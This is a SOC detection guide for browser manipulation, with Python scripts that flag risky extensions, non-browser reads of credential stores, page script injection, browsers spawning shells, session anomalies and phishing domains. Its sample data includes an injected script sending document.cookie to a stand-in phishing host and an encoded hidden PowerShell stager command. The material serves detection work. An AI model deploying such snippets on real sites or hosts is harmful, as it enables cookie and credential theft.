Detecting Browser Manipulation in the SOC
Preventive controls are essential, but organizations must assume some browser-based attacks will bypass initial defenses. Security Operations Centers (SOCs) should develop detection strategies that focus on identifying abnormal browser behavior, suspicious authentication activity, and indicators of session compromise.
Monitor Browser Extension Activity
Browser extensions are one of the most common attack vectors for browser manipulation.
Security teams should monitor for:
Installation of unauthorized extensions
Extensions requesting excessive permissions
Recently published or low-reputation extensions
Extension updates originating from unexpected sources
Users installing multiple extensions in a short period
Endpoint indicators of a malicious extension include:
Browser processes spawning unexpected child processes
Connections to newly registered domains
Access to credential stores
Unusual browser storage modifications
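The checks above can be run over an extension inventory rather than reviewed by hand. The script below is an added example, not code from the original article: it triages a list of installed extensions against an allowlist, flags broad permissions and non-Web-Store update sources, and detects several installs by one user inside a short window (Hunt #1 below). The inventory shape (one record per extension per user, carrying the manifest's permissions, host_permissions and update_url plus an install timestamp) is an assumption; in practice it would be exported from Chrome/Edge enterprise reporting, the extension settings in each profile's Preferences file, or an EDR query. The allowlist IDs and sample records are constructed.

```python
"""Triage a browser-extension inventory for the extension indicators above.

Added example, not code from the original article. Inventory shape,
allowlist IDs and sample records are assumptions/constructed data.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Permissions that let an extension read or modify every site, cookies,
# browsing history, or the host machine. Treat any of these as "broad".
BROAD_PERMISSIONS = {
    "<all_urls>", "*://*/*", "http://*/*", "https://*/*",
    "webRequest", "webRequestBlocking", "declarativeNetRequest",
    "cookies", "tabs", "history", "scripting", "debugger",
    "nativeMessaging", "clipboardRead",
}
# Extension IDs approved for this enterprise (placeholder values).
ALLOWLIST = {"approved-password-mgr-id", "approved-adblock-id"}
# Chrome Web Store update endpoint; any other update_url is self-hosted or sideloaded.
WEBSTORE_UPDATE_URL = "https://clients2.google.com/service/update2/crx"
BURST_WINDOW = timedelta(hours=1)   # "multiple extensions in a short period"
BURST_COUNT = 3


def triage_extensions(inventory):
    """Return findings as (user, extension_id, reason) tuples."""
    findings = []
    install_times = defaultdict(list)
    for ext in inventory:
        perms = set(ext.get("permissions", [])) | set(ext.get("host_permissions", []))
        reasons = []
        if ext["id"] not in ALLOWLIST:
            reasons.append("not on allowlist")
        broad = sorted(perms & BROAD_PERMISSIONS)
        if broad:
            reasons.append("broad permissions: " + ", ".join(broad))
        if ext.get("update_url") != WEBSTORE_UPDATE_URL:
            reasons.append("update source is not the Web Store")
        findings.extend((ext["user"], ext["id"], r) for r in reasons)
        install_times[ext["user"]].append(ext["installed_at"])
    # Several installs by one user inside a short window is its own indicator.
    for user, times in install_times.items():
        times.sort()
        for i, start in enumerate(times):
            burst = [t for t in times[i:] if t - start <= BURST_WINDOW]
            if len(burst) >= BURST_COUNT:
                findings.append((user, "*", f"{len(burst)} installs within {BURST_WINDOW}"))
                break
    return findings


# Constructed sample inventory: one approved extension, and one user who
# installs three unapproved extensions in 35 minutes, one of them sideloaded.
SAMPLE_INVENTORY = [
    {"user": "alice", "id": "approved-password-mgr-id", "permissions": ["storage"],
     "host_permissions": [], "update_url": WEBSTORE_UPDATE_URL,
     "installed_at": datetime(2024, 5, 1, 9, 0)},
    {"user": "bob", "id": "unknownext-000", "permissions": ["cookies", "webRequest"],
     "host_permissions": ["<all_urls>"], "update_url": "https://updates.example.net/crx",
     "installed_at": datetime(2024, 5, 2, 14, 5)},
    {"user": "bob", "id": "unknownext-001", "permissions": ["tabs"],
     "host_permissions": [], "update_url": WEBSTORE_UPDATE_URL,
     "installed_at": datetime(2024, 5, 2, 14, 20)},
    {"user": "bob", "id": "unknownext-002", "permissions": ["storage"],
     "host_permissions": [], "update_url": WEBSTORE_UPDATE_URL,
     "installed_at": datetime(2024, 5, 2, 14, 40)},
]

if __name__ == "__main__":
    for user, ext_id, reason in triage_extensions(SAMPLE_INVENTORY):
        print(f"{user:6} {ext_id:26} {reason}")
```

The rarity check ("rare extensions across the enterprise") is not in the block because it needs the whole fleet's inventory rather than one user's; in a SIEM it is a count of distinct hosts per extension ID, alerting on IDs seen on only one or two machines.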
Detect Session Hijacking
Session hijacking often leaves subtle indicators within authentication logs.
Monitor for:
Impossible travel events
Concurrent sessions from geographically distant locations
Changes in browser fingerprints during active sessions
Authentication token reuse across multiple IP addresses
Sudden privilege escalation after login
Cloud providers and Identity Providers (IdPs) frequently provide telemetry that can detect these anomalies.
Identify Browser-Based Credential Theft
Credential theft on the endpoint usually precedes the account compromise that later shows up in IdP logs, so file-access telemetry on browser profiles gives an earlier detection point.
Look for:
Access to browser credential databases
Attempts to read browser cookie stores
Access to local authentication tokens
Credential dumping tools targeting browser profiles
Processes interacting with browser memory
Examples include access to:
Chrome and Edge "Login Data" (saved passwords), "Web Data" and the "Cookies" database under the profile's User Data directory
Chromium's "Local State" file, which holds the DPAPI-protected key needed to decrypt those stores
Firefox logins.json and key4.db (saved passwords and their key material) and cookies.sqlite
Browser profile directories as a whole, especially when copied or archived by a non-browser process
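The following is an added example, not code from the original article, showing how the file-access indicators above become a detection. It takes EDR/Sysmon-style file-read events (time, user, process image, PID, target path), ignores the browser reading its own profile, flags any other process that reads a credential, cookie or key file inside a browser profile tree, and escalates when the same process reads both a key file (Local State or key4.db) and a secret store within a few minutes, which is the pattern an infostealer produces because it needs both to decrypt anything. The event shape, process names, paths and sample events are assumptions and constructed data.

```python
"""Flag processes other than the browser reading browser credential stores.

Added example, not code from the original article. Event shape and sample
events are constructed; the file names reflect current Chromium/Firefox layouts.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from pathlib import PureWindowsPath

# Chromium browsers keep the DPAPI-wrapped AES key in "Local State" and the
# encrypted secrets in "Login Data", "Web Data" and the cookie database;
# Firefox keeps logins in logins.json, key material in key4.db, cookies in cookies.sqlite.
KEY_FILES = {"local state", "key4.db"}
SECRET_FILES = {"login data", "web data", "cookies", "logins.json", "cookies.sqlite"}
PROFILE_MARKERS = {"user data", "profiles"}      # Chromium "User Data", Firefox "Profiles"
BROWSER_IMAGES = {"chrome.exe", "msedge.exe", "brave.exe", "firefox.exe"}
KEY_AND_SECRET_WINDOW = timedelta(minutes=5)


def is_credential_store(path):
    """True for a credential/cookie/key file that sits inside a browser profile tree."""
    p = PureWindowsPath(path)
    in_profile = any(part.lower() in PROFILE_MARKERS for part in p.parts)
    return in_profile and p.name.lower() in KEY_FILES | SECRET_FILES


def detect_credential_store_access(events):
    """Return findings as dicts with severity, time, user, process, pid and reason."""
    findings, reads = [], defaultdict(list)   # (user, image, pid) -> [(time, filename)]
    for ev in events:
        if not is_credential_store(ev["path"]):
            continue
        image = PureWindowsPath(ev["image"]).name.lower()
        if image in BROWSER_IMAGES:
            continue                           # the browser reading its own profile is normal
        name = PureWindowsPath(ev["path"]).name.lower()
        reads[(ev["user"], image, ev["pid"])].append((ev["time"], name))
        findings.append({"severity": "medium", "time": ev["time"], "user": ev["user"],
                         "process": image, "pid": ev["pid"],
                         "reason": f"non-browser process read {name}"})
    # Key file plus secret store, same process, short window: escalate.
    for (user, image, pid), items in reads.items():
        key_times = [t for t, n in items if n in KEY_FILES]
        secret_times = [t for t, n in items if n in SECRET_FILES]
        if key_times and secret_times and min(
                abs(k - s) for k in key_times for s in secret_times) <= KEY_AND_SECRET_WINDOW:
            findings.append({"severity": "high", "time": max(key_times + secret_times),
                             "user": user, "process": image, "pid": pid,
                             "reason": f"key file and secret store read within {KEY_AND_SECRET_WINDOW}"})
    return findings


# Constructed sample events (paths and process names are placeholders).
CHROME = r"C:\Users\bob\AppData\Local\Google\Chrome\User Data"
FIREFOX = r"C:\Users\alice\AppData\Roaming\Mozilla\Firefox\Profiles\x1y2z3.default-release"
STEALER = r"C:\Users\bob\AppData\Local\Temp\updater.exe"


def ev(time, user, image, pid, path):
    return {"time": datetime.fromisoformat(time), "user": user,
            "image": image, "pid": pid, "path": path}


SAMPLE_EVENTS = [
    ev("2024-05-10T10:00:00", "bob", r"C:\Program Files\Google\Chrome\Application\chrome.exe",
       4120, CHROME + r"\Default\Login Data"),
    ev("2024-05-10T10:02:10", "bob", STEALER, 7788, CHROME + r"\Local State"),
    ev("2024-05-10T10:02:11", "bob", STEALER, 7788, CHROME + r"\Default\Login Data"),
    ev("2024-05-10T10:02:12", "bob", STEALER, 7788, CHROME + r"\Default\Network\Cookies"),
    ev("2024-05-10T10:03:00", "bob", r"C:\Windows\System32\notepad.exe", 5010,
       r"C:\Users\bob\Documents\notes.txt"),
    ev("2024-05-10T10:05:00", "alice", r"C:\Program Files\Mozilla Firefox\firefox.exe",
       6001, FIREFOX + r"\key4.db"),
    ev("2024-05-10T10:05:30", "alice", r"C:\Users\alice\AppData\Local\Programs\Python\python.exe",
       6210, FIREFOX + r"\logins.json"),
]

if __name__ == "__main__":
    for f in detect_credential_store_access(SAMPLE_EVENTS):
        print(f["severity"].upper(), f["time"], f["user"], f["process"], f["pid"], f["reason"])
```

Backup agents, sync clients and browser updaters will also touch these paths; tune by adding their signed images to an allowlist rather than by dropping the file names, and treat a browser-named image running from an unusual directory as non-browser.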
Monitor DNS and Web Traffic
Network telemetry can reveal browser manipulation activity that may not be visible on endpoints.
Useful indicators include:
Communication with newly registered domains
Excessive redirects
Connections to known phishing infrastructure
Browser traffic to command-and-control servers
Repeated requests to suspicious JavaScript resources
Organizations should enrich DNS logs with threat intelligence feeds to identify emerging threats.
Detect Malicious JavaScript Activity
JavaScript injection attacks frequently generate observable indicators.
Monitor web application logs, Content Security Policy violation reports and periodic snapshots of page content for:
Unexpected script execution
Inline JavaScript where none previously existed
Suspicious DOM modifications
Unauthorized form changes
Repeated XSS payload attempts
Web Application Firewalls (WAFs) can provide valuable telemetry for detecting these events.
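Inline scripts and form changes are visible in the served page rather than in request logs, so one practical check is to diff a fresh fetch of each sensitive page against a stored known-good copy. The block below is an added example, not code from the original article: it inventories external script hosts, inline script hashes, form actions and hidden inputs in two HTML snapshots and reports what changed. The snapshots and hostnames are constructed; the "acme" domain is a placeholder for the organisation's own.

```python
"""Diff a page's script and form inventory against a known-good baseline.

Added example, not code from the original article. Snapshots and hosts are constructed.
"""
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlsplit


class PageInventory(HTMLParser):
    """Collect script sources, inline script hashes, form actions and hidden inputs."""

    def __init__(self):
        super().__init__()
        self.script_hosts = set()     # hosts of external <script src=...>
        self.inline_scripts = set()   # sha256 prefix of each inline script body
        self.forms = {}               # form id/name -> action
        self.hidden_inputs = set()    # (form, input name)
        self._script_buf = None
        self._form = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            if a.get("src"):
                self.script_hosts.add(urlsplit(a["src"]).hostname or "(relative)")
            else:
                self._script_buf = []          # inline script: capture its body
        elif tag == "form":
            self._form = a.get("id") or a.get("name") or f"form#{len(self.forms)}"
            self.forms[self._form] = a.get("action", "")
        elif tag == "input" and (a.get("type") or "").lower() == "hidden":
            self.hidden_inputs.add((self._form, a.get("name")))

    def handle_data(self, data):
        if self._script_buf is not None:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script_buf is not None:
            body = "".join(self._script_buf).strip()
            self.inline_scripts.add(hashlib.sha256(body.encode()).hexdigest()[:16])
            self._script_buf = None
        elif tag == "form":
            self._form = None


def inventory(html):
    p = PageInventory()
    p.feed(html)
    p.close()
    return p


def diff_snapshots(baseline_html, current_html):
    """Return (severity, message) findings for changes from baseline to current."""
    base, cur = inventory(baseline_html), inventory(current_html)
    findings = []
    for h in sorted(cur.inline_scripts - base.inline_scripts):
        findings.append(("high", f"new inline script (sha256 {h})"))
    for host in sorted(cur.script_hosts - base.script_hosts):
        findings.append(("high", f"external script from new host {host}"))
    for form, action in cur.forms.items():
        old = base.forms.get(form)
        if old is not None and old != action:
            findings.append(("high", f"form '{form}' action changed: {old!r} -> {action!r}"))
    for form, name in sorted(cur.hidden_inputs - base.hidden_inputs, key=str):
        findings.append(("low", f"hidden input '{name}' added to form '{form}'"))
    return findings


# Constructed snapshots: the baseline loads one first-party script; the current
# copy carries an injected inline script, a third-party loader, and a login
# form whose action now points off-site.
BASELINE = """<html><head><script src="https://cdn.acme.example/app.js"></script></head>
<body><form id="login" action="/login" method="post">
<input name="user"><input type="password" name="pass"></form></body></html>"""
CURRENT = """<html><head><script src="https://cdn.acme.example/app.js"></script>
<script>new Image().src="https://collect.example-phish.net/p?"+document.cookie;</script></head>
<body><form id="login" action="https://collect.example-phish.net/l" method="post">
<input name="user"><input type="password" name="pass">
<input type="hidden" name="tok" value="x"></form>
<script src="https://collect.example-phish.net/k.js"></script></body></html>"""

if __name__ == "__main__":
    for severity, message in diff_snapshots(BASELINE, CURRENT):
        print(severity.upper(), message)
```

Hashing inline script bodies means a legitimate deploy changes the baseline once and then stays quiet; a CSP with a report-uri gives the same signal from the browser side for scripts the server never served.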
Monitor for Browser Process Abuse
Man-in-the-Browser malware often manipulates browser processes directly.
Indicators may include:
Code injection into browser processes
Browser memory modification
Browser processes launching PowerShell or command shells
Unusual DLL loads
Browser processes communicating with unknown external destinations
Modern EDR solutions are particularly effective at detecting these behaviors.
Threat Hunting for Browser Manipulation
Proactive threat hunting can identify attacks before they result in a significant impact.
Sample hunting hypotheses include:
Hunt #1: Unauthorized Browser Extensions
Hypothesis: A user has installed a malicious extension to harvest credentials.
Search for:
Newly installed extensions
Rare extensions across the enterprise
Extensions requesting broad permissions
Users with extension installation activity followed by authentication anomalies
Hunt #2: Stolen Session Tokens
Hypothesis: An attacker is using a stolen authentication token.
Search for:
Simultaneous logins from different locations
Changes in user-agent strings during active sessions
Token reuse from multiple IP addresses
Access from anonymous VPN providers
Hunt #3: Browser-Based Malware
Hypothesis: Malware is actively manipulating browser activity.
Search for:
Browser process injections
Unusual browser child processes
Browser memory access events
Connections to known malicious infrastructure
Hunt #4: Browser-in-the-Browser Attacks
Hypothesis: Users are interacting with fraudulent authentication windows.
Search for:
Credential submissions (POSTs to login-style paths) to previously unseen domains in proxy logs
User reports of unusual login prompts
High volumes of failed authentication attempts
New phishing domains targeting corporate applications
MITRE ATT&CK Mapping
Many browser manipulation techniques align with known MITRE ATT&CK techniques:
| Technique | ATT&CK ID |
|---|---|
| Steal Web Session Cookie | T1539 |
| Browser Session Hijacking (man-in-the-browser) | T1185 |
| Input Capture | T1056 |
| Browser Extensions | T1176 |
| Command and Scripting Interpreter: JavaScript | T1059.007 |
| Credentials from Password Stores: Credentials from Web Browsers | T1555.003 |
| Application Layer Protocol: Web Protocols | T1071.001 |
| Phishing for Information | T1598 |
| Adversary-in-the-Middle | T1557 |
Mapping detections to ATT&CK techniques helps organizations measure coverage and identify visibility gaps.
Example SIEM Detection Use Cases
Organizations using platforms such as Graylog, Splunk, Microsoft Sentinel, Elastic, or QRadar can create detection content for:
High-Risk Browser Activity
Alert when:
A browser launches PowerShell
A browser launches cmd.exe
A browser launches scripting engines
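The process-creation rule above, and the "Monitor for Browser Process Abuse" indicators and Hunt #3 earlier, come down to one join: browser as parent, interpreter or LOLBin as child. The block below is an added example, not code from the original article. It runs over Sysmon event ID 1 / EDR-style process-creation records (parent image, image, command line), skips the browser's own helper processes, rates shells and script hosts as high, escalates when the command line carries evasion flags, and keeps any other unexpected child as a low-severity lead. The event shape and sample events are constructed.

```python
"""Flag browser processes that spawn shells, script hosts or other LOLBins.

Added example, not code from the original article. Event shape and samples are constructed.
"""
from pathlib import PureWindowsPath

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe", "iexplore.exe"}
# Interpreters and LOLBins a browser has no business launching.
HIGH_RISK_CHILDREN = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe",
    "msiexec.exe", "wmic.exe",
}
# Helpers a browser legitimately spawns: its own renderers and crash handler.
EXPECTED_CHILDREN = BROWSERS | {"crashpad_handler.exe", "notification_helper.exe"}
# Command-line fragments that make a hit worth escalating.
EVASION_MARKERS = ("-enc", "-encodedcommand", "-w hidden", "-windowstyle hidden",
                   "-nop", "bypass", "downloadstring", "invoke-expression", "frombase64string")


def image_name(path):
    return PureWindowsPath(path).name.lower()


def detect_browser_children(events):
    """Return findings as dicts: severity, host, parent, child, markers, command_line."""
    findings = []
    for ev in events:
        parent, child = image_name(ev["parent_image"]), image_name(ev["image"])
        if parent not in BROWSERS or child in EXPECTED_CHILDREN:
            continue
        cmd = ev.get("command_line", "")
        markers = [m for m in EVASION_MARKERS if m in cmd.lower()]
        if child in HIGH_RISK_CHILDREN:
            severity = "critical" if markers else "high"
        else:
            severity = "low"   # unexpected but not inherently bad (PDF readers, protocol handlers)
        findings.append({"severity": severity, "host": ev["host"], "parent": parent,
                         "child": child, "markers": markers, "command_line": cmd})
    return findings


# Constructed sample events: a renderer (benign), an encoded PowerShell stager,
# a shell from Edge, a PDF reader from Firefox, and PowerShell from Explorer (not a browser).
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"host": "ws01", "parent_image": CHROME, "image": CHROME,
     "command_line": "chrome.exe --type=renderer"},
    {"host": "ws01", "parent_image": CHROME, "image": PS,
     "command_line": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"host": "ws02", "parent_image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "image": r"C:\Windows\System32\cmd.exe", "command_line": "cmd.exe /c whoami"},
    {"host": "ws03", "parent_image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "image": r"C:\Program Files\Adobe\Acrobat\AcroRd32.exe", "command_line": "AcroRd32.exe invoice.pdf"},
    {"host": "ws03", "parent_image": r"C:\Windows\explorer.exe", "image": PS,
     "command_line": "powershell.exe"},
]

if __name__ == "__main__":
    for f in detect_browser_children(SAMPLE_EVENTS):
        print(f["severity"].upper(), f["host"], f["parent"], "->", f["child"], f["markers"])
```

The same logic is a one-line SIEM search (parent image in the browser set AND image in the interpreter set); the value of the script form is the severity split, which keeps "Edge opened Acrobat" out of the on-call queue while still recording it for hunting.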
Suspicious Authentication Activity
Alert when:
A session changes geographic location within an impossible time frame
Multiple IP addresses use the same session token
A session is established for an account whose policy requires MFA without a recorded MFA challenge
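The three rules above, the indicators in "Detect Session Hijacking" and Hunt #2 all read from the same sign-in and session telemetry, so the block below is one added example that serves all of them; it is not code from the original article. It computes impossible travel from geo-IP coordinates with the haversine formula, flags one session ID seen from several IPs or several user agents, and reports sign-ins that established a session without MFA for an account in the MFA-required set. The event shape (user, time, IP with latitude/longitude, session ID, user agent, event kind and MFA flag), the policy set and all sample events and addresses are assumptions and constructed data.

```python
"""Session-hijacking and authentication anomalies over IdP-style sign-in logs.

Added example, not code from the original article. Event shape and samples are constructed.
"""
from collections import defaultdict
from datetime import datetime
from math import asin, cos, radians, sin, sqrt

MAX_SPEED_KMH = 1000                        # faster than an airliner: impossible travel
MIN_DISTANCE_KM = 100                       # ignore geo-IP jitter inside one region
MFA_REQUIRED = {"alice", "bob", "carol"}   # placeholder policy scope


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two coordinates, in kilometres."""
    p1, p2 = radians(lat1), radians(lat2)
    dphi, dlam = radians(lat2 - lat1), radians(lon2 - lon1)
    a = sin(dphi / 2) ** 2 + cos(p1) * cos(p2) * sin(dlam / 2) ** 2
    return 2 * 6371.0 * asin(sqrt(a))


def detect_session_anomalies(events):
    """Return findings as (user, type, detail) tuples."""
    findings = []
    by_user, by_session = defaultdict(list), defaultdict(list)
    for ev in sorted(events, key=lambda e: e["time"]):
        by_user[ev["user"]].append(ev)
        by_session[ev["session"]].append(ev)
        if ev["kind"] == "login" and ev["user"] in MFA_REQUIRED and not ev.get("mfa"):
            findings.append((ev["user"], "mfa_missing", f"sign-in from {ev['ip']} without MFA"))
    # Impossible travel: consecutive events for one user, across all sessions.
    for user, evs in by_user.items():
        for prev, cur in zip(evs, evs[1:]):
            hours = (cur["time"] - prev["time"]).total_seconds() / 3600
            km = haversine_km(prev["lat"], prev["lon"], cur["lat"], cur["lon"])
            if km > MIN_DISTANCE_KM and (hours == 0 or km / hours > MAX_SPEED_KMH):
                findings.append((user, "impossible_travel",
                                 f"{km:.0f} km in {hours:.2f} h ({prev['ip']} -> {cur['ip']})"))
    # Token reuse and fingerprint drift: one session ID, several IPs or user agents.
    for session, evs in by_session.items():
        ips, uas = {e["ip"] for e in evs}, {e["ua"] for e in evs}
        if len(ips) > 1:
            findings.append((evs[0]["user"], "token_reuse", f"session {session} used from {sorted(ips)}"))
        if len(uas) > 1:
            findings.append((evs[0]["user"], "ua_change", f"session {session} user agent changed: {sorted(uas)}"))
    return findings


# Constructed sample: alice's session continues from Tokyo 45 minutes after a
# New York sign-in with a different browser; bob commutes London -> Paris in
# four hours; carol signs in without MFA.
NY, TOKYO = (40.7128, -74.0060), (35.6762, 139.6503)
LONDON, PARIS, BERLIN = (51.5074, -0.1278), (48.8566, 2.3522), (52.5200, 13.4050)


def ev(time, user, ip, geo, session, ua, kind="request", mfa=None):
    return {"time": datetime.fromisoformat(time), "user": user, "ip": ip, "lat": geo[0],
            "lon": geo[1], "session": session, "ua": ua, "kind": kind, "mfa": mfa}


SAMPLE_EVENTS = [
    ev("2024-05-10T09:00:00", "alice", "203.0.113.5", NY, "s1", "Chrome/124 Windows", "login", True),
    ev("2024-05-10T09:10:00", "alice", "203.0.113.5", NY, "s1", "Chrome/124 Windows"),
    ev("2024-05-10T09:45:00", "alice", "198.51.100.7", TOKYO, "s1", "Chrome/120 Linux"),
    ev("2024-05-10T10:00:00", "bob", "192.0.2.10", LONDON, "s2", "Firefox/125 macOS", "login", True),
    ev("2024-05-10T14:00:00", "bob", "192.0.2.44", PARIS, "s3", "Firefox/125 macOS", "login", True),
    ev("2024-05-10T11:00:00", "carol", "192.0.2.99", BERLIN, "s4", "Safari/17 iOS", "login", False),
]

if __name__ == "__main__":
    for user, kind, detail in detect_session_anomalies(SAMPLE_EVENTS):
        print(f"{user:6} {kind:18} {detail}")
```

Corporate VPN egress and mobile carrier NAT both produce IP changes mid-session, so the token-reuse rule is best scoped to IPs outside the organisation's known egress ranges; the user-agent check is the harder one for an attacker to avoid, because a replayed cookie is normally used from a different browser build than the one that minted it.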
Browser Extension Monitoring
Alert when:
Unauthorized extensions are installed
Extensions request elevated permissions
Extensions communicate with suspicious domains
Phishing Infrastructure Detection
Alert when:
Users access newly registered domains
DNS requests resolve to known phishing infrastructure
A user submits credentials to, or is redirected to, a newly observed login page whose domain or content imitates a corporate SaaS provider
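The three rules above and the "Monitor DNS and Web Traffic" section both depend on enriching DNS queries with registration age, threat intelligence and brand lookalike checks, so the block below is one added example that covers both (and Hunt #4's "new phishing domains targeting corporate applications"); it is not code from the original article. The registration-date map stands in for a WHOIS/RDAP lookup or a newly-registered-domain feed, the threat feed and enterprise baseline are constructed sets, and registrable-domain extraction keeps only the last two labels (a real deployment should use the Public Suffix List so that co.uk-style suffixes are handled). The domains, log lines and the company name "acme" are placeholders.

```python
"""Enrich DNS query logs with registration age, feed hits and brand lookalikes.

Added example, not code from the original article. Feeds, baseline and log lines are constructed.
"""
from datetime import date

NOW = date(2024, 5, 10)                      # constructed reference date
NRD_DAYS = 30
REGISTERED = {                               # stand-in for WHOIS/RDAP or an NRD feed
    "microsoft-online-login.com": date(2024, 5, 5),
    "example-phish.net": date(2023, 11, 2),
    "example.com": date(1995, 8, 14),
}
THREAT_FEED = {"example-phish.net"}
SANCTIONED = {"microsoftonline.com", "microsoft.com", "okta.com", "salesforce.com", "acme.com"}
BRAND_TOKENS = {"microsoft", "office365", "okta", "salesforce", "acme"}
SEEN_BEFORE = {"microsoftonline.com", "okta.com", "example.com", "google.com"}


def registrable(qname):
    """Last two labels only; use the Public Suffix List in production."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def levenshtein(a, b):
    """Edit distance, used to spot typosquats of sanctioned domains."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def assess(domain):
    """Return the reasons a registrable domain deserves review (empty if none)."""
    reasons = []
    if domain in SANCTIONED:
        return reasons
    sld = domain.split(".")[0]
    reg = REGISTERED.get(domain)
    if reg is not None and (NOW - reg).days <= NRD_DAYS:
        reasons.append(f"registered {(NOW - reg).days} days ago")
    if domain in THREAT_FEED:
        reasons.append("on threat feed")
    for token in sorted(BRAND_TOKENS):
        if token in sld:
            reasons.append(f"contains protected brand token '{token}'")
            break
    else:   # no brand token: look for a near-miss of a sanctioned name instead
        for good in sorted(SANCTIONED):
            good_sld = good.split(".")[0]
            d = levenshtein(sld, good_sld)
            if 0 < d <= max(1, len(good_sld) // 4):   # tolerance scales with name length
                reasons.append(f"typosquat of {good} (edit distance {d})")
                break
    if domain not in SEEN_BEFORE:
        reasons.append("first seen in enterprise DNS")
    return reasons


def triage_dns(dns_log):
    """Map registrable domain -> reasons, for every queried domain that warrants review."""
    out, checked = {}, {}
    for line in dns_log:
        qname = line.split()[2]                 # "time client qname" (constructed format)
        domain = registrable(qname)
        if domain not in checked:
            checked[domain] = assess(domain)
        if checked[domain]:
            out[domain] = checked[domain]
    return out


SAMPLE_DNS_LOG = [
    "2024-05-10T08:01:02 10.0.0.15 login.microsoftonline.com",
    "2024-05-10T08:01:09 10.0.0.15 microsoft-online-login.com",
    "2024-05-10T08:02:30 10.0.0.22 oktta.com",
    "2024-05-10T08:03:11 10.0.0.22 cdn.example-phish.net",
    "2024-05-10T08:03:40 10.0.0.31 www.example.com",
    "2024-05-10T08:04:00 10.0.0.31 login.microsoftonline.com",
]

if __name__ == "__main__":
    for domain, reasons in triage_dns(SAMPLE_DNS_LOG).items():
        print(domain, "->", "; ".join(reasons))
```

"First seen in enterprise DNS" on its own is noise at scale; it earns an alert only in combination with the other reasons, which is why the function returns all of them rather than a single verdict.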
These detections provide valuable visibility into attacks that may otherwise evade traditional perimeter defenses.